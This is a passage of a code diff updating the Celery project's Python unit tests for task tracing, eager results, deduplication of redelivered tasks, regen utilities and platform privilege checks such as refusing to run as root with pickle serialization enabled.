+ # Confirm that the call/errbacks on the original signature are linked
+ # to the replacement signature as expected
+ mock_chord_link.assert_called_once_with(callbacks)
+ mock_chord_link_error.assert_called_once_with(errbacks)
def test_replace_group(self):
c = group([self.mytask.s()], app=self.app)
@@ -1245,6 +1321,29 @@ def test_apply(self):
with pytest.raises(KeyError):
f.get()
+ def test_apply_simulates_delivery_info(self):
+ task_to_apply = self.task_check_request_context
+ with patch.object(
+ task_to_apply.request_stack, "push",
+ wraps=task_to_apply.request_stack.push,
+ ) as mock_push:
+ task_to_apply.apply(
+ priority=4,
+ routing_key='myroutingkey',
+ exchange='myexchange',
+ )
+
+ mock_push.assert_called_once()
+
+ request = mock_push.call_args[0][0]
+
+ assert request.delivery_info == {
+ 'is_eager': True,
+ 'exchange': 'myexchange',
+ 'routing_key': 'myroutingkey',
+ 'priority': 4,
+ }
+
class test_apply_async(TasksCase):
def common_send_task_arguments(self):
diff --git a/t/unit/tasks/test_trace.py b/t/unit/tasks/test_trace.py
index e78b6aa4148..55c106894bd 100644
--- a/t/unit/tasks/test_trace.py
+++ b/t/unit/tasks/test_trace.py
@@ -1,4 +1,5 @@
-from unittest.mock import Mock, patch
+from unittest.mock import ANY, Mock, PropertyMock, patch
+from uuid import uuid4
import pytest
from billiard.einfo import ExceptionInfo
@@ -6,23 +7,27 @@
from celery import group, signals, states, uuid
from celery.app.task import Context
-from celery.app.trace import (TraceInfo, _fast_trace_task, _trace_task_ret,
- build_tracer, get_log_policy, get_task_name,
+from celery.app.trace import (TraceInfo, build_tracer, fast_trace_task,
+ get_log_policy, get_task_name,
log_policy_expected, log_policy_ignore,
log_policy_internal, log_policy_reject,
log_policy_unexpected,
reset_worker_optimizations,
setup_worker_optimizations, trace_task,
- traceback_clear)
+ trace_task_ret, traceback_clear)
from celery.backends.base import BaseDictBackend
-from celery.exceptions import Ignore, Reject, Retry
+from celery.backends.cache import CacheBackend
+from celery.exceptions import BackendGetMetaError, Ignore, Reject, Retry
+from celery.states import PENDING
+from celery.worker.state import successful_requests
def trace(
- app, task, args=(), kwargs={}, propagate=False, eager=True, request=None, **opts
+ app, task, args=(), kwargs={}, propagate=False,
+ eager=True, request=None, task_id='id-1', **opts
):
t = build_tracer(task.name, task, eager=eager, propagate=propagate, app=app, **opts)
- ret = t('id-1', args, kwargs, request)
+ ret = t(task_id, args, kwargs, request)
return ret.retval, ret.info
@@ -56,6 +61,14 @@ def test_trace_successful(self):
assert info is None
assert retval == 4
+ def test_trace_before_start(self):
+ @self.app.task(shared=False, before_start=Mock())
+ def add_with_before_start(x, y):
+ return x + y
+
+ self.trace(add_with_before_start, (2, 2), {})
+ add_with_before_start.before_start.assert_called()
+
def test_trace_on_success(self):
@self.app.task(shared=False, on_success=Mock())
def add_with_success(x, y):
@@ -148,6 +161,75 @@ def add(x, y):
with pytest.raises(MemoryError):
self.trace(add, (2, 2), {}, eager=False)
+ def test_eager_task_does_not_store_result_even_if_not_ignore_result(self):
+ @self.app.task(shared=False)
+ def add(x, y):
+ return x + y
+
+ add.backend = Mock(name='backend')
+ add.ignore_result = False
+
+ self.trace(add, (2, 2), {}, eager=True)
+
+ add.backend.mark_as_done.assert_called_once_with(
+ 'id-1', # task_id
+ 4, # result
+ ANY, # request
+ False # store_result
+ )
+
+ def test_eager_task_does_not_call_store_result(self):
+ @self.app.task(shared=False)
+ def add(x, y):
+ return x + y
+
+ backend = BaseDictBackend(app=self.app)
+ backend.store_result = Mock()
+ add.backend = backend
+ add.ignore_result = False
+
+ self.trace(add, (2, 2), {}, eager=True)
+
+ add.backend.store_result.assert_not_called()
+
+ def test_eager_task_will_store_result_if_proper_setting_is_set(self):
+ @self.app.task(shared=False)
+ def add(x, y):
+ return x + y
+
+ add.backend = Mock(name='backend')
+ add.store_eager_result = True
+ add.ignore_result = False
+
+ self.trace(add, (2, 2), {}, eager=True)
+
+ add.backend.mark_as_done.assert_called_once_with(
+ 'id-1', # task_id
+ 4, # result
+ ANY, # request
+ True # store_result
+ )
+
+ def test_eager_task_with_setting_will_call_store_result(self):
+ @self.app.task(shared=False)
+ def add(x, y):
+ return x + y
+
+ backend = BaseDictBackend(app=self.app)
+ backend.store_result = Mock()
+ add.backend = backend
+ add.store_eager_result = True
+ add.ignore_result = False
+
+ self.trace(add, (2, 2), {}, eager=True)
+
+ add.backend.store_result.assert_called_once_with(
+ 'id-1',
+ 4,
+ states.SUCCESS,
+ request=ANY
+ )
+
def test_when_backend_raises_exception(self):
@self.app.task(shared=False)
def add(x, y):
@@ -176,42 +258,33 @@ def raise_dummy():
except KeyError as exc:
traceback_clear(exc)
- if sys.version_info >= (3, 5, 0):
- tb_ = exc.__traceback__
- while tb_ is not None:
- if str(tb_.tb_frame.__repr__) == frame_list[0]:
- assert len(tb_.tb_frame.f_locals) == 0
- tb_ = tb_.tb_next
- elif (2, 7, 0) <= sys.version_info < (3, 0, 0):
- sys.exc_clear.assert_called()
+ tb_ = exc.__traceback__
+ while tb_ is not None:
+ if str(tb_.tb_frame.__repr__) == frame_list[0]:
+ assert len(tb_.tb_frame.f_locals) == 0
+ tb_ = tb_.tb_next
try:
raise_dummy()
except KeyError as exc:
traceback_clear()
- if sys.version_info >= (3, 5, 0):
- tb_ = exc.__traceback__
- while tb_ is not None:
- if str(tb_.tb_frame.__repr__) == frame_list[0]:
- assert len(tb_.tb_frame.f_locals) == 0
- tb_ = tb_.tb_next
- elif (2, 7, 0) <= sys.version_info < (3, 0, 0):
- sys.exc_clear.assert_called()
+ tb_ = exc.__traceback__
+ while tb_ is not None:
+ if str(tb_.tb_frame.__repr__) == frame_list[0]:
+ assert len(tb_.tb_frame.f_locals) == 0
+ tb_ = tb_.tb_next
try:
raise_dummy()
except KeyError as exc:
traceback_clear(str(exc))
- if sys.version_info >= (3, 5, 0):
- tb_ = exc.__traceback__
- while tb_ is not None:
- if str(tb_.tb_frame.__repr__) == frame_list[0]:
- assert len(tb_.tb_frame.f_locals) == 0
- tb_ = tb_.tb_next
- elif (2, 7, 0) <= sys.version_info < (3, 0, 0):
- sys.exc_clear.assert_called()
+ tb_ = exc.__traceback__
+ while tb_ is not None:
+ if str(tb_.tb_frame.__repr__) == frame_list[0]:
+ assert len(tb_.tb_frame.f_locals) == 0
+ tb_ = tb_.tb_next
@patch('celery.app.trace.traceback_clear')
def test_when_Ignore(self, mock_traceback_clear):
@@ -345,7 +418,7 @@ def test_trace_exception(self, mock_traceback_clear):
mock_traceback_clear.assert_called()
def test_trace_task_ret__no_content_type(self):
- _trace_task_ret(
+ trace_task_ret(
self.add.name, 'id1', {}, ((2, 2), {}, {}), None, None, app=self.app,
)
@@ -353,7 +426,7 @@ def test_fast_trace_task__no_content_type(self):
self.app.tasks[self.add.name].__trace__ = build_tracer(
self.add.name, self.add, app=self.app,
)
- _fast_trace_task(
+ fast_trace_task(
self.add.name,
'id1',
{},
@@ -406,6 +479,95 @@ def xtask():
assert info is not None
assert isinstance(ret, ExceptionInfo)
+ def test_deduplicate_successful_tasks__deduplication(self):
+ @self.app.task(shared=False)
+ def add(x, y):
+ return x + y
+
+ backend = CacheBackend(app=self.app, backend='memory')
+ add.backend = backend
+ add.store_eager_result = True
+ add.ignore_result = False
+ add.acks_late = True
+
+ self.app.conf.worker_deduplicate_successful_tasks = True
+ task_id = str(uuid4())
+ request = {'id': task_id, 'delivery_info': {'redelivered': True}}
+
+ assert trace(self.app, add, (1, 1), task_id=task_id, request=request) == (2, None)
+ assert trace(self.app, add, (1, 1), task_id=task_id, request=request) == (None, None)
+
+ self.app.conf.worker_deduplicate_successful_tasks = False
+
+ def test_deduplicate_successful_tasks__no_deduplication(self):
+ @self.app.task(shared=False)
+ def add(x, y):
+ return x + y
+
+ backend = CacheBackend(app=self.app, backend='memory')
+ add.backend = backend
+ add.store_eager_result = True
+ add.ignore_result = False
+ add.acks_late = True
+
+ self.app.conf.worker_deduplicate_successful_tasks = True
+ task_id = str(uuid4())
+ request = {'id': task_id, 'delivery_info': {'redelivered': True}}
+
+ with patch('celery.app.trace.AsyncResult') as async_result_mock:
+ async_result_mock().state.return_value = PENDING
+ assert trace(self.app, add, (1, 1), task_id=task_id, request=request) == (2, None)
+ assert trace(self.app, add, (1, 1), task_id=task_id, request=request) == (2, None)
+
+ self.app.conf.worker_deduplicate_successful_tasks = False
+
+ def test_deduplicate_successful_tasks__result_not_found(self):
+ @self.app.task(shared=False)
+ def add(x, y):
+ return x + y
+
+ backend = CacheBackend(app=self.app, backend='memory')
+ add.backend = backend
+ add.store_eager_result = True
+ add.ignore_result = False
+ add.acks_late = True
+
+ self.app.conf.worker_deduplicate_successful_tasks = True
+ task_id = str(uuid4())
+ request = {'id': task_id, 'delivery_info': {'redelivered': True}}
+
+ with patch('celery.app.trace.AsyncResult') as async_result_mock:
+ assert trace(self.app, add, (1, 1), task_id=task_id, request=request) == (2, None)
+ state_property = PropertyMock(side_effect=BackendGetMetaError)
+ type(async_result_mock()).state = state_property
+ assert trace(self.app, add, (1, 1), task_id=task_id, request=request) == (2, None)
+
+ self.app.conf.worker_deduplicate_successful_tasks = False
+
+ def test_deduplicate_successful_tasks__cached_request(self):
+ @self.app.task(shared=False)
+ def add(x, y):
+ return x + y
+
+ backend = CacheBackend(app=self.app, backend='memory')
+ add.backend = backend
+ add.store_eager_result = True
+ add.ignore_result = False
+ add.acks_late = True
+
+ self.app.conf.worker_deduplicate_successful_tasks = True
+
+ task_id = str(uuid4())
+ request = {'id': task_id, 'delivery_info': {'redelivered': True}}
+
+ successful_requests.add(task_id)
+
+ assert trace(self.app, add, (1, 1), task_id=task_id,
+ request=request) == (None, None)
+
+ successful_requests.clear()
+ self.app.conf.worker_deduplicate_successful_tasks = False
+
class test_TraceInfo(TraceCase):
class TI(TraceInfo):
@@ -422,6 +584,32 @@ def test_handle_error_state(self):
call_errbacks=True,
)
+ def test_handle_error_state_for_eager_task(self):
+ x = self.TI(states.FAILURE)
+ x.handle_failure = Mock()
+
+ x.handle_error_state(self.add, self.add.request, eager=True)
+ x.handle_failure.assert_called_once_with(
+ self.add,
+ self.add.request,
+ store_errors=False,
+ call_errbacks=True,
+ )
+
+ def test_handle_error_for_eager_saved_to_backend(self):
+ x = self.TI(states.FAILURE)
+ x.handle_failure = Mock()
+
+ self.add.store_eager_result = True
+
+ x.handle_error_state(self.add, self.add.request, eager=True)
+ x.handle_failure.assert_called_with(
+ self.add,
+ self.add.request,
+ store_errors=True,
+ call_errbacks=True,
+ )
+
@patch('celery.app.trace.ExceptionInfo')
def test_handle_reject(self, ExceptionInfo):
x = self.TI(states.FAILURE)
@@ -444,4 +632,4 @@ def foo(self, i):
assert foo(1).called_directly
finally:
- reset_worker_optimizations()
+ reset_worker_optimizations(self.app)
diff --git a/t/unit/test_canvas.py b/t/unit/test_canvas.py
new file mode 100644
index 00000000000..4ba7ba59f3e
--- /dev/null
+++ b/t/unit/test_canvas.py
@@ -0,0 +1,33 @@
+import uuid
+
+
+class test_Canvas:
+
+ def test_freeze_reply_to(self):
+ # Tests that Canvas.freeze() correctly
+ # creates reply_to option
+
+ @self.app.task
+ def test_task(a, b):
+ return
+
+ s = test_task.s(2, 2)
+ s.freeze()
+
+ from concurrent.futures import ThreadPoolExecutor
+
+ def foo():
+ s = test_task.s(2, 2)
+ s.freeze()
+ return self.app.thread_oid, s.options['reply_to']
+ with ThreadPoolExecutor(max_workers=1) as executor:
+ future = executor.submit(foo)
+ t_reply_to_app, t_reply_to_opt = future.result()
+
+ assert uuid.UUID(s.options['reply_to'])
+ assert uuid.UUID(t_reply_to_opt)
+ # reply_to must be equal to thread_oid of Application
+ assert self.app.thread_oid == s.options['reply_to']
+ assert t_reply_to_app == t_reply_to_opt
+ # reply_to must be thread-relative.
+ assert t_reply_to_opt != s.options['reply_to']
diff --git a/t/unit/utils/test_collections.py b/t/unit/utils/test_collections.py
index 1830c7ce7cd..be5f96d2ad2 100644
--- a/t/unit/utils/test_collections.py
+++ b/t/unit/utils/test_collections.py
@@ -1,5 +1,5 @@
import pickle
-from collections import Mapping
+from collections.abc import Mapping
from itertools import count
from time import monotonic
@@ -129,11 +129,11 @@ def test_len(self):
assert len(self.view) == 2
def test_isa_mapping(self):
- from collections import Mapping
+ from collections.abc import Mapping
assert issubclass(ConfigurationView, Mapping)
def test_isa_mutable_mapping(self):
- from collections import MutableMapping
+ from collections.abc import MutableMapping
assert issubclass(ConfigurationView, MutableMapping)
@@ -178,7 +178,7 @@ def test_add(self):
def test_purge(self):
# purge now enforces rules
- # cant purge(1) now. but .purge(now=...) still works
+ # can't purge(1) now. but .purge(now=...) still works
s = LimitedSet(maxlen=10)
[s.add(i) for i in range(10)]
s.maxlen = 2
diff --git a/t/unit/utils/test_dispatcher.py b/t/unit/utils/test_dispatcher.py
index b5e11c40bb8..b100b68b800 100644
--- a/t/unit/utils/test_dispatcher.py
+++ b/t/unit/utils/test_dispatcher.py
@@ -15,13 +15,13 @@ def garbage_collect():
elif hasattr(sys, 'pypy_version_info'):
- def garbage_collect(): # noqa
+ def garbage_collect():
# Collecting weakreferences can take two collections on PyPy.
gc.collect()
gc.collect()
else:
- def garbage_collect(): # noqa
+ def garbage_collect():
gc.collect()
diff --git a/t/unit/utils/test_functional.py b/t/unit/utils/test_functional.py
index 503b7476655..721fd414a3e 100644
--- a/t/unit/utils/test_functional.py
+++ b/t/unit/utils/test_functional.py
@@ -1,10 +1,13 @@
+import collections
+
import pytest
+import pytest_subtests # noqa: F401
from kombu.utils.functional import lazy
from celery.utils.functional import (DummyContext, first, firstmethod,
fun_accepts_kwargs, fun_takes_argument,
- head_from_fun, maybe_list, mlazy,
- padlist, regen, seq_concat_item,
+ head_from_fun, lookahead, maybe_list,
+ mlazy, padlist, regen, seq_concat_item,
seq_concat_seq)
@@ -66,6 +69,10 @@ def predicate(value):
assert iterations[0] == 10
+def test_lookahead():
+ assert list(lookahead(x for x in range(6))) == [(0, 1), (1, 2), (2, 3), (3, 4), (4, 5), (5, None)]
+
+
def test_maybe_list():
assert maybe_list(1) == [1]
assert maybe_list([1]) == [1]
@@ -94,8 +101,11 @@ def test_list(self):
fun, args = r.__reduce__()
assert fun(*args) == l
- def test_gen(self):
- g = regen(iter(list(range(10))))
+ @pytest.fixture
+ def g(self):
+ return regen(iter(list(range(10))))
+
+ def test_gen(self, g):
assert g[7] == 7
assert g[6] == 6
assert g[5] == 5
@@ -107,17 +117,19 @@ def test_gen(self):
assert g.data, list(range(10))
assert g[8] == 8
assert g[0] == 0
- g = regen(iter(list(range(10))))
+
+ def test_gen__index_2(self, g):
assert g[0] == 0
assert g[1] == 1
assert g.data == list(range(10))
- g = regen(iter([1]))
- assert g[0] == 1
+
+ def test_gen__index_error(self, g):
+ assert g[0] == 0
with pytest.raises(IndexError):
- g[1]
- assert g.data == [1]
+ g[11]
+ assert list(iter(g)) == list(range(10))
- g = regen(iter(list(range(10))))
+ def test_gen__negative_index(self, g):
assert g[-1] == 9
assert g[-2] == 8
assert g[-3] == 7
@@ -128,12 +140,146 @@ def test_gen(self):
assert list(iter(g)) == list(range(10))
+ def test_nonzero__does_not_consume_more_than_first_item(self):
+ def build_generator():
+ yield 1
+ pytest.fail("generator should not consume past first item")
+ yield 2
+
+ g = regen(build_generator())
+ assert bool(g)
+ assert g[0] == 1
+
+ def test_nonzero__empty_iter(self):
+ assert not regen(iter([]))
+
+ def test_deque(self):
+ original_list = [42]
+ d = collections.deque(original_list)
+ # Confirm that concretising a `regen()` instance repeatedly for an
+ # equality check always returns the original list
+ g = regen(d)
+ assert g == original_list
+ assert g == original_list
+
+ def test_repr(self):
+ def die():
+ raise AssertionError("Generator died")
+ yield None
+
+ # Confirm that `regen()` instances are not concretised when represented
+ g = regen(die())
+ assert "..." in repr(g)
+
+ def test_partial_reconcretisation(self):
+ class WeirdIterator():
+ def __init__(self, iter_):
+ self.iter_ = iter_
+ self._errored = False
+
+ def __iter__(self):
+ yield from self.iter_
+ if not self._errored:
+ try:
+ # This should stop the regen instance from marking
+ # itself as being done
+ raise AssertionError("Iterator errored")
+ finally:
+ self._errored = True
+
+ original_list = list(range(42))
+ g = regen(WeirdIterator(original_list))
+ iter_g = iter(g)
+ for e in original_list:
+ assert e == next(iter_g)
+ with pytest.raises(AssertionError, match="Iterator errored"):
+ next(iter_g)
+ # The following checks are for the known "misbehaviour"
+ assert getattr(g, "_regen__done") is False
+ # If the `regen()` instance doesn't think it's done then it'll dupe the
+ # elements from the underlying iterator if it can be re-used
+ iter_g = iter(g)
+ for e in original_list * 2:
+ assert next(iter_g) == e
+ with pytest.raises(StopIteration):
+ next(iter_g)
+ assert getattr(g, "_regen__done") is True
+ # Finally we xfail this test to keep track of it
+ raise pytest.xfail(reason="#6794")
+
+ def test_length_hint_passthrough(self, g):
+ assert g.__length_hint__() == 10
+
+ def test_getitem_repeated(self, g):
+ halfway_idx = g.__length_hint__() // 2
+ assert g[halfway_idx] == halfway_idx
+ # These are now concretised so they should be returned without any work
+ assert g[halfway_idx] == halfway_idx
+ for i in range(halfway_idx + 1):
+ assert g[i] == i
+ # This should only need to concretise one more element
+ assert g[halfway_idx + 1] == halfway_idx + 1
+
+ def test_done_does_not_lag(self, g):
+ """
+ Don't allow regen to return from `__iter__()` and check `__done`.
+ """
+ # The range we zip with here should ensure that the `regen.__iter__`
+ # call never gets to return since we never attempt a failing `next()`
+ len_g = g.__length_hint__()
+ for i, __ in zip(range(len_g), g):
+ assert getattr(g, "_regen__done") is (i == len_g - 1)
+ # Just for sanity, check against a specific `bool` here
+ assert getattr(g, "_regen__done") is True
+
+ def test_lookahead_consume(self, subtests):
+ """
+ Confirm that regen looks ahead by a single item as expected.
+ """
+ def g():
+ yield from ["foo", "bar"]
+ raise pytest.fail("This should never be reached")
+
+ with subtests.test(msg="bool does not overconsume"):
+ assert bool(regen(g()))
+ with subtests.test(msg="getitem 0th does not overconsume"):
+ assert regen(g())[0] == "foo"
+ with subtests.test(msg="single iter does not overconsume"):
+ assert next(iter(regen(g()))) == "foo"
+
+ class ExpectedException(BaseException):
+ pass
+
+ def g2():
+ yield from ["foo", "bar"]
+ raise ExpectedException()
+
+ with subtests.test(msg="getitem 1th does overconsume"):
+ r = regen(g2())
+ with pytest.raises(ExpectedException):
+ r[1]
+ # Confirm that the item was concretised anyway
+ assert r[1] == "bar"
+ with subtests.test(msg="full iter does overconsume"):
+ r = regen(g2())
+ with pytest.raises(ExpectedException):
+ for _ in r:
+ pass
+ # Confirm that the items were concretised anyway
+ assert r == ["foo", "bar"]
+ with subtests.test(msg="data access does overconsume"):
+ r = regen(g2())
+ with pytest.raises(ExpectedException):
+ r.data
+ # Confirm that the items were concretised anyway
+ assert r == ["foo", "bar"]
+
class test_head_from_fun:
def test_from_cls(self):
class X:
- def __call__(x, y, kwarg=1): # noqa
+ def __call__(x, y, kwarg=1):
pass
g = head_from_fun(X())
@@ -203,6 +349,28 @@ def f(cls, x):
fun = head_from_fun(A.f, bound=True)
assert fun(1) == 1
+ def test_kwonly_required_args(self):
+ local = {}
+ fun = ('def f_kwargs_required(*, a="a", b, c=None):'
+ ' return')
+ exec(fun, {}, local)
+ f_kwargs_required = local['f_kwargs_required']
+ g = head_from_fun(f_kwargs_required)
+
+ with pytest.raises(TypeError):
+ g(1)
+
+ with pytest.raises(TypeError):
+ g(a=1)
+
+ with pytest.raises(TypeError):
+ g(c=1)
+
+ with pytest.raises(TypeError):
+ g(a=2, c=1)
+
+ g(b=3)
+
class test_fun_takes_argument:
@@ -238,7 +406,7 @@ def fun(a, b, foo):
])
def test_seq_concat_seq(a, b, expected):
res = seq_concat_seq(a, b)
- assert type(res) is type(expected) # noqa
+ assert type(res) is type(expected)
assert res == expected
@@ -248,7 +416,7 @@ def test_seq_concat_seq(a, b, expected):
])
def test_seq_concat_item(a, b, expected):
res = seq_concat_item(a, b)
- assert type(res) is type(expected) # noqa
+ assert type(res) is type(expected)
assert res == expected
diff --git a/t/unit/utils/test_local.py b/t/unit/utils/test_local.py
index a10accf086d..621a77595b2 100644
--- a/t/unit/utils/test_local.py
+++ b/t/unit/utils/test_local.py
@@ -1,4 +1,3 @@
-import sys
from unittest.mock import Mock
import pytest
@@ -143,8 +142,6 @@ def test_listproxy(self):
x[0:2] = [1, 2]
del(x[0:2])
assert str(x)
- if sys.version_info[0] < 3:
- assert x.__cmp__(object()) == -1
def test_complex_cast(self):
diff --git a/t/unit/utils/test_pickle.py b/t/unit/utils/test_pickle.py
index 936300a3945..a915e9446f6 100644
--- a/t/unit/utils/test_pickle.py
+++ b/t/unit/utils/test_pickle.py
@@ -9,7 +9,7 @@ class ArgOverrideException(Exception):
def __init__(self, message, status_code=10):
self.status_code = status_code
- Exception.__init__(self, message, status_code)
+ super().__init__(message, status_code)
class test_Pickle:
diff --git a/t/unit/utils/test_platforms.py b/t/unit/utils/test_platforms.py
index c58a3ed6d68..1c0a03d9893 100644
--- a/t/unit/utils/test_platforms.py
+++ b/t/unit/utils/test_platforms.py
@@ -1,30 +1,32 @@
import errno
import os
+import re
import signal
import sys
import tempfile
from unittest.mock import Mock, call, patch
import pytest
-from case import mock
import t.skip
from celery import _find_option_with_arg, platforms
-from celery.exceptions import SecurityError
-from celery.platforms import (DaemonContext, LockFailed, Pidfile,
- _setgroups_hack, check_privileges,
+from celery.exceptions import SecurityError, SecurityWarning
+from celery.platforms import (ASSUMING_ROOT, ROOT_DISALLOWED,
+ ROOT_DISCOURAGED, DaemonContext, LockFailed,
+ Pidfile, _setgroups_hack, check_privileges,
close_open_fds, create_pidlock, detached,
fd_by_path, get_fdmax, ignore_errno, initgroups,
isatty, maybe_drop_privileges, parse_gid,
- parse_uid, set_mp_process_title,
+ parse_uid, set_mp_process_title, set_pdeathsig,
set_process_title, setgid, setgroups, setuid,
signals)
from celery.utils.text import WhateverIO
+from t.unit import conftest
try:
import resource
except ImportError: # pragma: no cover
- resource = None # noqa
+ resource = None
def test_isatty():
@@ -158,6 +160,7 @@ def test_reset(self, set):
def test_setitem(self, set):
def handle(*args):
return args
+
signals['INT'] = handle
set.assert_called_with(signal.SIGINT, handle)
@@ -167,6 +170,18 @@ def test_setitem_raises(self, set):
signals['INT'] = lambda *a: a
+class test_set_pdeathsig:
+
+ def test_call(self):
+ set_pdeathsig('SIGKILL')
+
+ @t.skip.if_win32
+ def test_call_with_correct_parameter(self):
+ with patch('celery.platforms._set_pdeathsig') as _set_pdeathsig:
+ set_pdeathsig('SIGKILL')
+ _set_pdeathsig.assert_called_once_with(signal.SIGKILL)
+
+
@t.skip.if_win32
class test_get_fdmax:
@@ -218,6 +233,7 @@ class pw_struct:
def raise_on_second_call(*args, **kwargs):
setuid.side_effect = OSError()
setuid.side_effect.errno = errno.EPERM
+
setuid.side_effect = raise_on_second_call
getpwuid.return_value = pw_struct()
parse_uid.return_value = 5001
@@ -237,7 +253,9 @@ def to_root_on_second_call(mock, first):
def on_first_call(*args, **kwargs):
ret, return_value[0] = return_value[0], 0
return ret
+
mock.side_effect = on_first_call
+
to_root_on_second_call(geteuid, 10)
to_root_on_second_call(getuid, 10)
with pytest.raises(SecurityError):
@@ -259,6 +277,7 @@ def on_first_call(*args, **kwargs):
def raise_on_second_call(*args, **kwargs):
setuid.side_effect = OSError()
setuid.side_effect.errno = errno.ENOENT
+
setuid.side_effect = raise_on_second_call
with pytest.raises(OSError):
maybe_drop_privileges(uid='user')
@@ -274,6 +293,7 @@ def test_with_guid(self, initgroups, setuid, setgid,
def raise_on_second_call(*args, **kwargs):
setuid.side_effect = OSError()
setuid.side_effect.errno = errno.EPERM
+
setuid.side_effect = raise_on_second_call
parse_uid.return_value = 5001
parse_gid.return_value = 50001
@@ -327,7 +347,6 @@ def test_parse_uid_when_int(self):
@patch('pwd.getpwnam')
def test_parse_uid_when_existing_name(self, getpwnam):
-
class pwent:
pw_uid = 5001
@@ -346,7 +365,6 @@ def test_parse_gid_when_int(self):
@patch('grp.getgrnam')
def test_parse_gid_when_existing_name(self, getgrnam):
-
class grent:
gr_gid = 50001
@@ -411,7 +429,7 @@ def test_without_resource(self):
@patch('celery.platforms.signals')
@patch('celery.platforms.maybe_drop_privileges')
@patch('os.geteuid')
- @patch(mock.open_fqdn)
+ @patch('builtins.open')
def test_default(self, open, geteuid, maybe_drop,
signals, pidlock):
geteuid.return_value = 0
@@ -512,7 +530,7 @@ def test_create_pidlock(self, Pidfile):
p = Pidfile.return_value = Mock()
p.is_locked.return_value = True
p.remove_if_stale.return_value = False
- with mock.stdouts() as (_, err):
+ with conftest.stdouts() as (_, err):
with pytest.raises(SystemExit):
create_pidlock('/var/pid')
assert 'already exists' in err.getvalue()
@@ -549,14 +567,14 @@ def test_is_locked(self, exists):
assert not p.is_locked()
def test_read_pid(self):
- with mock.open() as s:
+ with conftest.open() as s:
s.write('1816\n')
s.seek(0)
p = Pidfile('/var/pid')
assert p.read_pid() == 1816
def test_read_pid_partially_written(self):
- with mock.open() as s:
+ with conftest.open() as s:
s.write('1816')
s.seek(0)
p = Pidfile('/var/pid')
@@ -566,20 +584,20 @@ def test_read_pid_partially_written(self):
def test_read_pid_raises_ENOENT(self):
exc = IOError()
exc.errno = errno.ENOENT
- with mock.open(side_effect=exc):
+ with conftest.open(side_effect=exc):
p = Pidfile('/var/pid')
assert p.read_pid() is None
def test_read_pid_raises_IOError(self):
exc = IOError()
exc.errno = errno.EAGAIN
- with mock.open(side_effect=exc):
+ with conftest.open(side_effect=exc):
p = Pidfile('/var/pid')
with pytest.raises(IOError):
p.read_pid()
def test_read_pid_bogus_pidfile(self):
- with mock.open() as s:
+ with conftest.open() as s:
s.write('eighteensixteen\n')
s.seek(0)
p = Pidfile('/var/pid')
@@ -637,7 +655,7 @@ def test_remove_if_stale_process_alive(self, kill):
@patch('os.kill')
def test_remove_if_stale_process_dead(self, kill):
- with mock.stdouts():
+ with conftest.stdouts():
p = Pidfile('/var/pid')
p.read_pid = Mock()
p.read_pid.return_value = 1816
@@ -650,7 +668,7 @@ def test_remove_if_stale_process_dead(self, kill):
p.remove.assert_called_with()
def test_remove_if_stale_broken_pid(self):
- with mock.stdouts():
+ with conftest.stdouts():
p = Pidfile('/var/pid')
p.read_pid = Mock()
p.read_pid.side_effect = ValueError()
@@ -661,7 +679,7 @@ def test_remove_if_stale_broken_pid(self):
@patch('os.kill')
def test_remove_if_stale_unprivileged_user(self, kill):
- with mock.stdouts():
+ with conftest.stdouts():
p = Pidfile('/var/pid')
p.read_pid = Mock()
p.read_pid.return_value = 1817
@@ -686,7 +704,7 @@ def test_remove_if_stale_no_pidfile(self):
@patch('os.getpid')
@patch('os.open')
@patch('os.fdopen')
- @patch(mock.open_fqdn)
+ @patch('builtins.open')
def test_write_pid(self, open_, fdopen, osopen, getpid, fsync):
getpid.return_value = 1816
osopen.return_value = 13
@@ -713,7 +731,7 @@ def test_write_pid(self, open_, fdopen, osopen, getpid, fsync):
@patch('os.getpid')
@patch('os.open')
@patch('os.fdopen')
- @patch(mock.open_fqdn)
+ @patch('builtins.open')
def test_write_reread_fails(self, open_, fdopen,
osopen, getpid, fsync):
getpid.return_value = 1816
@@ -739,6 +757,7 @@ def on_setgroups(groups):
setgroups.return_value = True
return
raise ValueError()
+
setgroups.side_effect = on_setgroups
_setgroups_hack(list(range(400)))
@@ -756,6 +775,7 @@ def on_setgroups(groups):
setgroups.return_value = True
return
raise exc
+
setgroups.side_effect = on_setgroups
_setgroups_hack(list(range(400)))
@@ -817,17 +837,218 @@ def test_setgroups_raises_EPERM(self, hack, getgroups):
getgroups.assert_called_with()
-def test_check_privileges():
- class Obj:
- fchown = 13
- prev, platforms.os = platforms.os, Obj()
- try:
- with pytest.raises(SecurityError):
- check_privileges({'pickle'})
- finally:
- platforms.os = prev
- prev, platforms.os = platforms.os, object()
- try:
+fails_on_win32 = pytest.mark.xfail(
+ sys.platform == "win32",
+ reason="fails on py38+ windows",
+)
+
+
+@fails_on_win32
+@pytest.mark.parametrize('accept_content', [
+ {'pickle'},
+ {'application/group-python-serialize'},
+ {'pickle', 'application/group-python-serialize'},
+])
+@patch('celery.platforms.os')
+def test_check_privileges_suspicious_platform(os_module, accept_content):
+ del os_module.getuid
+ del os_module.getgid
+ del os_module.geteuid
+ del os_module.getegid
+
+ with pytest.raises(SecurityError,
+ match=r'suspicious platform, contact support'):
+ check_privileges(accept_content)
+
+
+@pytest.mark.parametrize('accept_content', [
+ {'pickle'},
+ {'application/group-python-serialize'},
+ {'pickle', 'application/group-python-serialize'}
+])
+def test_check_privileges(accept_content, recwarn):
+ check_privileges(accept_content)
+
+ assert len(recwarn) == 0
+
+
+@pytest.mark.parametrize('accept_content', [
+ {'pickle'},
+ {'application/group-python-serialize'},
+ {'pickle', 'application/group-python-serialize'}
+])
+@patch('celery.platforms.os')
+def test_check_privileges_no_fchown(os_module, accept_content, recwarn):
+ del os_module.fchown
+ check_privileges(accept_content)
+
+ assert len(recwarn) == 0
+
+
+@fails_on_win32
+@pytest.mark.parametrize('accept_content', [
+ {'pickle'},
+ {'application/group-python-serialize'},
+ {'pickle', 'application/group-python-serialize'}
+])
+@patch('celery.platforms.os')
+def test_check_privileges_without_c_force_root(os_module, accept_content):
+ os_module.environ = {}
+ os_module.getuid.return_value = 0
+ os_module.getgid.return_value = 0
+ os_module.geteuid.return_value = 0
+ os_module.getegid.return_value = 0
+
+ expected_message = re.escape(ROOT_DISALLOWED.format(uid=0, euid=0,
+ gid=0, egid=0))
+ with pytest.raises(SecurityError,
+ match=expected_message):
+ check_privileges(accept_content)
+
+
+@fails_on_win32
+@pytest.mark.parametrize('accept_content', [
+ {'pickle'},
+ {'application/group-python-serialize'},
+ {'pickle', 'application/group-python-serialize'}
+])
+@patch('celery.platforms.os')
